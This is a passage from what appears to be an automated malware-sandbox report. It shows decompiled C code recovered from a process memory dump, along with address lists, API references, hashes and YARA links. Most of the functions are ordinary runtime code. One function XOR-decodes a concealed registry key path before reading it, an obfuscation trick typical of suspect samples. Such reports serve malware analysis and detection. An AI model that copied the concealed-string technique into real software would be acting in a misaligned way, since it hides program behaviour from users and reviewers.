							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E00B564B8( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E00B564B8(_t285);
						goto L31;
					}
				} else {
					_t220 = E00B55BBD();
					_t299 = 0x16;
					 *_t220 = _t299;
					E00B528EC();
					L31:
					return _t299;
				}
				L81:
			}

0x00b599f8
0x00b599fb
0x00b59a01
0x00b59a17
0x00b59a1b
0x00b59a1e
0x00b59a20
0x00b59a22
0x00b59a24
0x00b59a26
0x00b59a29
0x00b59a2c
0x00b59a2f
0x00b59a31
0x00b59a94
0x00b59a96
0x00b59a99
0x00b59a9b
0x00b59a9f
0x00b59aa8
0x00b59aa9
0x00b59aac
0x00b59aae
0x00b59ab1
0x00b59ab5
0x00b59ab5
0x00b59ab7
0x00b59ab9
0x00b59abb
0x00b59abd
0x00b59abd
0x00b59abf
0x00b59ac2
0x00b59ac5
0x00b59ac5
0x00b59ac7
0x00b59ac8
0x00b59ac8
0x00b59ad3
0x00b59ad5
0x00b59ad8
0x00b59ad9
0x00b59adc
0x00b59adc
0x00b59ae0
0x00b59ae3
0x00b59ae6
0x00b59ae6
0x00b59ae6
0x00b59af3
0x00b59af5
0x00b59af8
0x00b59afa
0x00b59b12
0x00b59b15
0x00b59b18
0x00b59b1a
0x00b59b1d
0x00b59b1f
0x00b59b22
0x00b59b25
0x00b59b82
0x00b59b85
0x00b59b88
0x00b59b8a
0x00000000
0x00b59b27
0x00b59b29
0x00b59b29
0x00b59b2b
0x00b59b2e
0x00b59b2e
0x00b59b30
0x00b59b32
0x00b59b38
0x00b59b3b
0x00b59b3b
0x00b59b3d
0x00b59b3e
0x00b59b3e
0x00b59b45
0x00b59b48
0x00b59b4c
0x00b59b59
0x00b59b5e
0x00b59b61
0x00b59b63
0x00b59bd9
0x00b59bda
0x00b59bdb
0x00b59bdc
0x00b59bdd
0x00b59bde
0x00b59be3
0x00b59be7
0x00b59be9
0x00b59bea
0x00b59bed
0x00b59bed
0x00b59bf0
0x00b59bf0
0x00b59bf2
0x00b59bf3
0x00b59bf3
0x00b59bf7
0x00b59bf8
0x00b59bff
0x00b59c02
0x00b59c05
0x00b59c07
0x00b59c11
0x00b59c12
0x00b59c13
0x00b59c16
0x00b59c20
0x00b59c24
0x00b59c26
0x00b59c3a
0x00b59c3a
0x00b59c3d
0x00b59c47
0x00b59c4c
0x00b59c4f
0x00b59c51
0x00000000
0x00b59c53
0x00b59c53
0x00b59c58
0x00b59c5f
0x00b59c62
0x00b59c64
0x00b59c75
0x00b59c77
0x00b59c79
0x00b59c79
0x00b59c79
0x00b59c66
0x00b59c67
0x00b59c6c
0x00b59c6f
0x00b59c7e
0x00b59c84
0x00000000
0x00b59c87
0x00b59c28
0x00b59c28
0x00b59c2e
0x00b59c33
0x00b59c36
0x00b59c38
0x00b59c8a
0x00b59c8c
0x00b59c8d
0x00b59c8e
0x00b59c8f
0x00b59c90
0x00b59c91
0x00b59c96
0x00b59c99
0x00b59c9a
0x00b59c9c
0x00b59ca2
0x00b59ca9
0x00b59cac
0x00b59caf
0x00b59cb2
0x00b59cb3
0x00b59cb4
0x00b59cb7
0x00b59cbd
0x00b59cbf
0x00b59cc1
0x00b59cc1
0x00b59cc3
0x00b59cc5
0x00000000
0x00000000
0x00b59cc7
0x00b59cc9
0x00b59ccb
0x00b59ccd
0x00b59cd8
0x00b59cda
0x00b59cdc
0x00000000
0x00000000
0x00b59cdc
0x00b59ccd
0x00000000
0x00b59cc9
0x00b59cde
0x00b59cde
0x00b59ce4
0x00b59ce6
0x00b59cec
0x00b59cee
0x00b59d10
0x00b59d10
0x00b59d12
0x00b59d14
0x00b59d20
0x00b59d20
0x00b59d16
0x00b59d16
0x00b59d18
0x00000000
0x00b59d1a
0x00b59d1a
0x00b59d1c
0x00b59d1e
0x00000000
0x00000000
0x00b59d1e
0x00b59d18
0x00b59d28
0x00b59d30
0x00b59d36
0x00b59d37
0x00b59d39
0x00b59d41
0x00b59d47
0x00b59d4d
0x00b59d53
0x00b59d67
0x00b59d6c
0x00b59d77
0x00b59d87
0x00b59d8d
0x00b59d8f
0x00b59d92
0x00b59db5
0x00b59db5
0x00b59dba
0x00b59dc0
0x00b59dc0
0x00b59dc6
0x00b59dcc
0x00b59dd2
0x00b59dd8
0x00b59dde
0x00b59dff
0x00b59e04
0x00b59e09
0x00b59e0d
0x00b59e13
0x00b59e16
0x00b59e29
0x00b59e29
0x00b59e2f
0x00b59e35
0x00b59e36
0x00b59e37
0x00b59e3c
0x00b59e3f
0x00b59e45
0x00b59e47
0x00b59ea5
0x00b59eab
0x00b59eb3
0x00b59eb8
0x00b59ebe
0x00b59ebf
0x00000000
0x00000000
0x00000000
0x00b59e18
0x00b59e18
0x00b59e1b
0x00b59e1d
0x00000000
0x00b59e1f
0x00b59e1f
0x00b59e22
0x00000000
0x00b59e24
0x00b59e24
0x00b59e27
0x00000000
0x00000000
0x00000000
0x00000000
0x00b59e27
0x00b59e22
0x00b59e1d
0x00b59ec1
0x00b59ec2
0x00000000
0x00b59e49
0x00b59e49
0x00b59e4f
0x00b59e57
0x00b59e5c
0x00b59e6b
0x00b59e6b
0x00b59e73
0x00b59e79
0x00b59e7f
0x00b59e86
0x00b59e89
0x00b59e8b
0x00b59e9b
0x00b59ea0
0x00000000
0x00b59d94
0x00b59d94
0x00b59d9a
0x00b59d9b
0x00b59d9c
0x00b59d9d
0x00b59da5
0x00b59da5
0x00b59ec8
0x00b59ec8
0x00b59ed0
0x00b59ed8
0x00b59edd
0x00b59cf0
0x00b59cf3
0x00b59cf5
0x00b59d0a
0x00000000
0x00b59cf7
0x00b59cf7
0x00b59cfa
0x00b59cfb
0x00b59cfc
0x00b59cfd
0x00b59d02
0x00b59cf5
0x00b59ee4
0x00b59eef
0x00000000
0x00000000
0x00000000
0x00b59c38
0x00b59c09
0x00b59c0b
0x00b59c0c
0x00b59c10
0x00b59c10
0x00000000
0x00000000
0x00000000
0x00000000
0x00b59b65
0x00b59b65
0x00b59b6b
0x00b59b6e
0x00b59b71
0x00b59b74
0x00b59b77
0x00b59b7a
0x00b59b7d
0x00b59b7d
0x00000000
0x00b59b2e
0x00b59afc
0x00b59afc
0x00b59aff
0x00b59b8c
0x00b59b8d
0x00b59b92
0x00000000
0x00b59b92
0x00b59a33
0x00b59a33
0x00b59a36
0x00b59a3e
0x00b59a41
0x00b59a48
0x00b59a4a
0x00b59a4c
0x00b59a67
0x00b59a68
0x00b59a69
0x00b59a6a
0x00b59a6f
0x00b59a72
0x00b59a75
0x00b59a4e
0x00b59a4e
0x00b59a51
0x00b59a52
0x00b59a53
0x00b59a54
0x00b59a55
0x00b59a5a
0x00b59a5c
0x00b59a5f
0x00b59a5f
0x00b59a77
0x00b59a79
0x00000000
0x00000000
0x00b59a82
0x00b59a85
0x00b59a88
0x00b59a8a
0x00b59a8c
0x00000000
0x00b59a8e
0x00b59a8e
0x00b59a91
0x00000000
0x00b59a91
0x00000000
0x00b59a8c
0x00b59b07
0x00b59b93
0x00b59b96
0x00b59b9a
0x00b59ba3
0x00b59ba6
0x00b59baa
0x00b59baa
0x00b59bac
0x00b59baf
0x00b59bb1
0x00b59bb3
0x00b59bb5
0x00b59bba
0x00b59bbb
0x00b59bbf
0x00b59bbf
0x00b59bc3
0x00b59bc6
0x00b59bc6
0x00b59bca
0x00000000
0x00b59bd1
0x00b59a03
0x00b59a03
0x00b59a0a
0x00b59a0b
0x00b59a0d
0x00b59bd2
0x00b59bd8
0x00b59bd8
0x00000000

APIs

_free.LIBCMT ref: 00B59B8D

Strings

*?, xrefs: 00B59A36

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: c2ebbc5fb6461f12ea3eedaf0aba459f12cd7cfba1e74b480c8682c6e8ee96b0
Instruction ID: a565a12b500b8cf921e9fc245eb87bf9d80302df92c4a57fbb5e0d512df3660b
Opcode Fuzzy Hash: c2ebbc5fb6461f12ea3eedaf0aba459f12cd7cfba1e74b480c8682c6e8ee96b0
Instruction Fuzzy Hash: F4611975E00219DFDB14CFA9D8816ADFBF5EF48311B2481EAE815E7300D675AE458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B42861, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B42861(void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v27;
				short _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v104;
				void* _v108;
				signed int _t25;
				void* _t33;
				void _t34;
				void _t35;
				void* _t43;
				signed int _t47;
				void* _t54;
				signed int _t55;
				intOrPtr _t57;
				void* _t58;
				void* _t65;
				signed int _t67;

				_t25 =  *0xb69014; // 0x26ce9e99
				_v8 = _t25 ^ _t67;
				asm("movaps xmm0, [0xb3dec0]");
				_t43 = 0;
				asm("movups [ebp-0x64], xmm0");
				asm("movaps xmm0, [0xb3db00]");
				_t57 = _a4;
				asm("movups [ebp-0x54], xmm0");
				_v40 = 0xe4edeec7;
				asm("movaps xmm0, [0xb3db10]");
				asm("movups [ebp-0x44], xmm0");
				_v36 = 0xc4a6e0e8;
				asm("movaps xmm0, [0xb3dc30]");
				asm("movups [ebp-0x34], xmm0");
				_v32 = 0xe6e5fbe0;
				_v28 = 0xe9;
				do {
					_t7 = _t43 + 0x40; // 0x40
					 *(_t67 + _t43 - 0x64) =  *(_t67 + _t43 - 0x64) ^ _t7;
					_t43 = _t43 + 1;
				} while (_t43 < 0x4d);
				_v27 = 0;
				if(RegOpenKeyA(0x80000002,  &_v104,  &_v108) == 0) {
					asm("movaps xmm0, [0xb3dab0]");
					_push(_t43);
					asm("movups [ebp-0x14], xmm0");
					E00B42CCF( &_v24, _v108, E00B42D2B( &_v24), _t57);
					_v20 = 0x312a221c;
					_v16 = 0x6923282b;
					_v12 = 0x2f312d;
					_t33 = E00B427DA( &_v20);
					_t54 = _t33;
					_t65 = _t33;
					do {
						_t34 =  *_t54;
						_t54 = _t54 + 1;
					} while (_t34 != 0);
					_t55 = _t54 - _t65;
					_t58 = _t57 - 1;
					do {
						_t35 =  *(_t58 + 1);
						_t58 = _t58 + 1;
					} while (_t35 != 0);
					_t47 = _t55 >> 2;
					memcpy(_t58, _t65, _t47 << 2);
					memcpy(_t65 + _t47 + _t47, _t65, _t55 & 0x00000003);
					RegCloseKey(_v108);
				} else {
				}
				return E00B4AE43(_v8 ^ _t67);
			}

0x00b42867
0x00b4286e
0x00b42871
0x00b42878
0x00b4287a
0x00b4287f
0x00b42886
0x00b42889
0x00b4288d
0x00b42894
0x00b4289b
0x00b4289f
0x00b428a6
0x00b428ad
0x00b428b1
0x00b428b8
0x00b428be
0x00b428be
0x00b428c1
0x00b428c5
0x00b428c6
0x00b428ce
0x00b428e4
0x00b428ea
0x00b428f2
0x00b428f7
0x00b42904
0x00b4290c
0x00b42913
0x00b4291a
0x00b42921
0x00b42926
0x00b42928
0x00b4292a
0x00b4292a
0x00b4292c
0x00b4292d
0x00b42931
0x00b42933
0x00b42934
0x00b42934
0x00b42937
0x00b42938
0x00b42941
0x00b42944
0x00b4294b
0x00b4294d
0x00b428e6
0x00b428e6
0x00b42963

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00B428DC

Part of subcall function 00B42CCF: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00B42909,?,00000000,?), ref: 00B42CEB

RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B4294D

Strings

-1/, xrefs: 00B4291A
+(#i, xrefs: 00B42913

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: +(#i$-1/
API String ID: 3677997916-1514103559
Opcode ID: 42deae8c889dd1b21425627ae77dde4fc9f3d3aeeb19ec76e65d42073cb822e6
Instruction ID: 2911f4960280917ca233baa0313adecb6af9a4a3fc1bb08931e0b046ce5c1f2a
Opcode Fuzzy Hash: 42deae8c889dd1b21425627ae77dde4fc9f3d3aeeb19ec76e65d42073cb822e6
Instruction Fuzzy Hash: 7031CD60D042499ADB01CFA8D9116FEFBF4FF69308F905258E846B7121EF306B86E761

Uniqueness

Uniqueness Score: -1.00%

Function 00B43475, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B43475(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _t41;
				signed int* _t58;
				signed int* _t60;
				void* _t75;
				signed int* _t76;

				_t75 = __ecx;
				E00B4B97D(__ecx, 0);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				if(_a4 == 0) {
					_t58 =  &_v16;
					E00B43434(_t58, "bad locale name");
					E00B4D24A( &_v16, 0xb664a4);
					asm("int3");
					_push(_t75);
					_t76 = _t58;
					E00B4BD26(_t58, _t76);
					if(_t76[0xb] != 0) {
						E00B50985(_t76[0xb]);
					}
					_t76[0xb] = 0;
					if(_t76[9] != 0) {
						E00B50985(_t76[9]);
					}
					_t76[9] = 0;
					if(_t76[7] != 0) {
						E00B50985(_t76[7]);
					}
					_t76[7] = 0;
					if(_t76[5] != 0) {
						E00B50985(_t76[5]);
					}
					_t76[5] = 0;
					if(_t76[3] != 0) {
						E00B50985(_t76[3]);
					}
					_t76[3] = 0;
					if(_t76[1] != 0) {
						E00B50985(_t76[1]);
					}
					_t76[1] = 0;
					_t60 = _t76;
					_t41 =  *_t60;
					if(_t41 == 0) {
						return E00B5536B(4);
					} else {
						if(_t41 < 8) {
							return E00B4C23B(0xb6a0a0 + _t41 * 0x18, 0xb6a0a0 + _t41 * 0x18);
						}
						return _t41;
					}
				} else {
					E00B4BCDB(__ecx, __ecx, _a4);
					return _t75;
				}
			}

0x00b4347f
0x00b43482
0x00b43487
0x00b4348c
0x00b4348f
0x00b43492
0x00b43495
0x00b43498
0x00b4349c
0x00b4349f
0x00b434a3
0x00b434a6
0x00b434a9
0x00b434ac
0x00b434b2
0x00b434cc
0x00b434cf
0x00b434dd
0x00b434e2
0x00b434e3
0x00b434e4
0x00b434e8
0x00b434f2
0x00b434f7
0x00b434fc
0x00b434ff
0x00b43505
0x00b4350a
0x00b4350f
0x00b43510
0x00b43516
0x00b4351b
0x00b43520
0x00b43521
0x00b43527
0x00b4352c
0x00b43531
0x00b43532
0x00b43538
0x00b4353d
0x00b43542
0x00b43543
0x00b43549
0x00b4354e
0x00b43553
0x00b43554
0x00b43557
0x00b4b9d5
0x00b4b9d9
0x00b55398
0x00b4b9df
0x00b4b9e2
0x00000000
0x00b4b9f2
0x00b4b9f3
0x00b4b9f3
0x00b434b4
0x00b434b8
0x00b434c4
0x00b434c4

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B43482
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B434B8

Part of subcall function 00B4BCDB: _Yarn.LIBCPMT ref: 00B4BCFA
Part of subcall function 00B4BCDB: _Yarn.LIBCPMT ref: 00B4BD1E

__CxxThrowException@8.LIBVCRUNTIME ref: 00B434DD

Strings

bad locale name, xrefs: 00B434C7

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 40eca8cdc4d661d1f5473a1c51c4c74df27fba03704b0163fe586e3e05f3fbe7
Instruction ID: 2b04f989d176cefb20af15341b31f01f57614e2ab55dea7151b602185398cec2
Opcode Fuzzy Hash: 40eca8cdc4d661d1f5473a1c51c4c74df27fba03704b0163fe586e3e05f3fbe7
Instruction Fuzzy Hash: 7E018671505744AFC321DFBA9481887FBE8BE1875079489AEE1DEC3A12D770F604CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00B43AC3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00B43B0D

Strings

ios_base::badbit set, xrefs: 00B43AD4, 00B43AF5
ios_base::eofbit set, xrefs: 00B43AE4
ios_base::failbit set, xrefs: 00B43ADF, 00B43B13

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: afd5597e6ac436dc35062a42ae5c6f88afabe2c4295df7445a608c748be3308e
Instruction ID: e98a63b64da4b0d6a8e2b40ffcc850e7ad5b8ff5fad6a61714fc5f458a494f11
Opcode Fuzzy Hash: afd5597e6ac436dc35062a42ae5c6f88afabe2c4295df7445a608c748be3308e
Instruction Fuzzy Hash: FFF0906290432C72DB14AA50EC82FDE7AE8DB14B40F2845E8FD8666191D6A09B44A3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00B640BE, Relevance: 6.1, APIs: 4, Instructions: 133
fileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B640BE(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				int _t34;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				intOrPtr* _t43;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E00B64071( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00B55BBD()));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00B572D3(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if((_t31 & _t58) == 0xffffffff) {
							goto L28;
						}
						_t34 = SetEndOfFile(E00B5B205(_t50));
						__eflags = _t34;
						if(_t34 != 0) {
							L18:
							_t59 = 0;
							L29:
							E00B572D3(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00B55BBD())) = 0xd;
						_t36 = E00B55BAA();
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00B598AF(0x1000, 1);
						_pop(_t54);
						if(_t38 != 0) {
							_v12 = E00B537CE(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00B62B23(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(_t42 == 0xffffffff) {
										_t43 = E00B55BAA();
										__eflags =  *_t43 - 5;
										if( *_t43 == 5) {
											 *((intOrPtr*)(E00B55BBD())) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00B55BBD()));
										E00B564B8(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00B537CE(_t56, _t50, _v12);
							E00B564B8(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00B55BBD())) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x00b640be
0x00b640c7
0x00b640d6
0x00b640e4
0x00b6420d
0x00b64212
0x00000000
0x00b640f9
0x00b640f9
0x00b640fc
0x00b640ff
0x00b64102
0x00b64104
0x00b641c9
0x00b641d2
0x00b641d9
0x00b641dc
0x00b641df
0x00000000
0x00000000
0x00b641e9
0x00b641ef
0x00b641f1
0x00b64196
0x00b64196
0x00b64214
0x00b6421f
0x00b6422f
0x00b6422f
0x00b641f8
0x00b641fe
0x00b6420b
0x00000000
0x00b6420b
0x00b6410a
0x00b64120
0x00b64123
0x00b64126
0x00b64141
0x00b64144
0x00b64147
0x00b64148
0x00b64148
0x00b6414a
0x00b6415d
0x00b6415d
0x00b6415f
0x00b64162
0x00b64167
0x00b6416a
0x00b6416d
0x00b6419a
0x00b6419f
0x00b641a2
0x00b641a9
0x00b641a9
0x00b641af
0x00b641b5
0x00b641b7
0x00000000
0x00b641bc
0x00b6416f
0x00b64170
0x00b64172
0x00b64175
0x00b64177
0x00b6417a
0x00b6417c
0x00b64156
0x00b64156
0x00000000
0x00b64156
0x00b6417e
0x00000000
0x00000000
0x00000000
0x00b6417e
0x00b6414c
0x00000000
0x00000000
0x00b6414e
0x00b64154
0x00000000
0x00000000
0x00000000
0x00b64180
0x00b64180
0x00b64180
0x00b64188
0x00b6418e
0x00b64193
0x00000000
0x00b64193
0x00b6412d
0x00000000
0x00b641bf
0x00b641bf
0x00b641c1
0x00000000
0x00000000
0x00b641c3
0x00000000
0x00000000
0x00b641c5
0x00b641c7
0x00000000
0x00000000
0x00000000
0x00b641c7
0x00b6410a

APIs

_free.LIBCMT ref: 00B6418E
_free.LIBCMT ref: 00B641B7
SetEndOfFile.KERNEL32(00000000,00B61DBD,00000000,00B5892B,?,?,?,?,?,?,?,00B61DBD,00B5892B,00000000), ref: 00B641E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00B61DBD,00B5892B,00000000,?,?,?,?,00000000), ref: 00B64205

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 2d09999e5f5aa43cdf53dbac59f9f3bbd7e9e723fe35d44d7ea6056076b088a8
Instruction ID: b16e1182c33a568e9ca160cedfa427e1d3be451392f3ae004efdacc18f5bf796
Opcode Fuzzy Hash: 2d09999e5f5aa43cdf53dbac59f9f3bbd7e9e723fe35d44d7ea6056076b088a8
Instruction Fuzzy Hash: 8141C572900A099BDB21AFA8CC46B9E3BF5EF56761F2401D1F924F7291EB7CC8844760

Uniqueness

Uniqueness Score: -1.00%

Function 00B61292, Relevance: 6.1, APIs: 4, Instructions: 90
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B61292(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, struct _SECURITY_ATTRIBUTES* _a12, struct _SECURITY_ATTRIBUTES* _a16, int _a20, long _a24, void* _a28, intOrPtr _a32, struct _STARTUPINFOW* _a36, struct _PROCESS_INFORMATION* _a40) {
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				char _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				char _v76;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				void* _t56;
				WCHAR* _t60;

				_t56 = __ecx;
				_t55 = 0;
				_t60 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = E00B55F7B(_t56, _a4,  &_v76, E00B56E67(__eflags));
				_t66 = _t43;
				if(_t43 == 0 && E00B55F7B(_t56, _a8,  &_v52, E00B56E67(_t66)) == 0) {
					_t68 = _a32;
					if(_a32 == 0) {
						L5:
						_t55 = CreateProcessW(_v68, _v44, _a12, _a16, _a20, _a24, _a28, _t55, _a36, _a40);
					} else {
						_t54 = E00B55F7B(_t56, _a32,  &_v28, E00B56E67(_t68));
						_t60 = _v20;
						if(_t54 == 0) {
							_t55 = _t60;
							goto L5;
						}
					}
				}
				if(_v8 != 0) {
					E00B564B8(_t60);
				}
				if(_v32 != 0) {
					E00B564B8(_v44);
				}
				if(_v56 != 0) {
					E00B564B8(_v68);
				}
				return _t55;
			}

0x00b61292
0x00b6129b
0x00b6129e
0x00b612a0
0x00b612a3
0x00b612a6
0x00b612a9
0x00b612ac
0x00b612af
0x00b612b2
0x00b612b5
0x00b612b8
0x00b612bb
0x00b612be
0x00b612c1
0x00b612c4
0x00b612c7
0x00b612ca
0x00b612cd
0x00b612d0
0x00b612d3
0x00b612e3
0x00b612eb
0x00b612ed
0x00b61308
0x00b6130b
0x00b6132b
0x00b6134d
0x00b6130d
0x00b6131a
0x00b6131f
0x00b61327
0x00b61329
0x00000000
0x00b61329
0x00b61327
0x00b6130b
0x00b61353
0x00b61356
0x00b6135b
0x00b61360
0x00b61365
0x00b6136a
0x00b6136f
0x00b61374
0x00b61379
0x00b61381

APIs

CreateProcessW.KERNEL32 ref: 00B61347
_free.LIBCMT ref: 00B61356
_free.LIBCMT ref: 00B61365
_free.LIBCMT ref: 00B61374

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CreateProcess
String ID:
API String ID: 1318292368-0
Opcode ID: 9abf3f59dec7738373ee7c7b24e3141faa590b483cd3c49e1cbf56ea28e31277
Instruction ID: d35880490adda1be497933f2e34576433cb77927d0b2cb602a43e394e7c0a445
